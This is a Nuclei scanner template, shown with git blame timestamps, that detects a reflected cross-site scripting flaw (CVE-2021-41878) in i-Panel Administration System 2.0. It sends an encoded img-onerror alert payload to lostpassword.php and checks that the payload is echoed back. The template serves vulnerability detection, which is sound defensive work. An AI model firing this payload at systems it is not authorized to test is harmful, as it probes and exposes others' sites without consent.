nuclei-templates/http/cves/2021/CVE-2021-41878.yaml

51 lines
1.5 KiB
YAML
Raw Normal View History

2021-10-06 08:22:02 +00:00
id: CVE-2021-41878
info:
name: i-Panel Administration System 2.0 - Cross-Site Scripting
2021-10-06 08:22:02 +00:00
author: madrobot
severity: medium
2022-09-20 16:13:09 +00:00
description: |
i-Panel Administration System 2.0 contains a cross-site scripting vulnerability that enables an attacker to execute arbitrary JavaScript code in the browser-based web console.
2021-10-06 08:22:02 +00:00
reference:
- https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
- https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-41878
- https://nvd.nist.gov/vuln/detail/CVE-2021-41878
- http://packetstormsecurity.com/files/164519/i-Panel-Administration-System-2.0-Cross-Site-Scripting.html
2021-10-06 08:22:02 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2021-10-06 08:22:02 +00:00
cve-id: CVE-2021-41878
cwe-id: CWE-79
epss-score: 0.00476
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:hkurl:i-panel_administration_system:2.0:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.72656
2022-09-20 13:21:36 +00:00
metadata:
max-request: 1
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: hkurl
product: i-panel_administration_system
tags: cve,cve2021,ipanel,xss,packetstorm
2021-10-06 08:22:02 +00:00
http:
2021-10-06 08:22:02 +00:00
- method: GET
path:
2022-09-20 13:21:36 +00:00
- '{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E'
2021-10-06 08:22:02 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-09-20 13:21:36 +00:00
words:
2022-09-20 13:24:10 +00:00
- '><img src=a onerror=alert("document.domain")>'
2022-09-20 16:13:09 +00:00
- 'i-Panel Administration'
2022-09-20 13:21:36 +00:00
condition: and
2021-10-06 08:22:02 +00:00
- type: word
2022-09-20 13:21:36 +00:00
part: header
2021-10-06 08:22:02 +00:00
words:
- "text/html"
2022-09-20 13:21:36 +00:00
- type: status
status:
- 200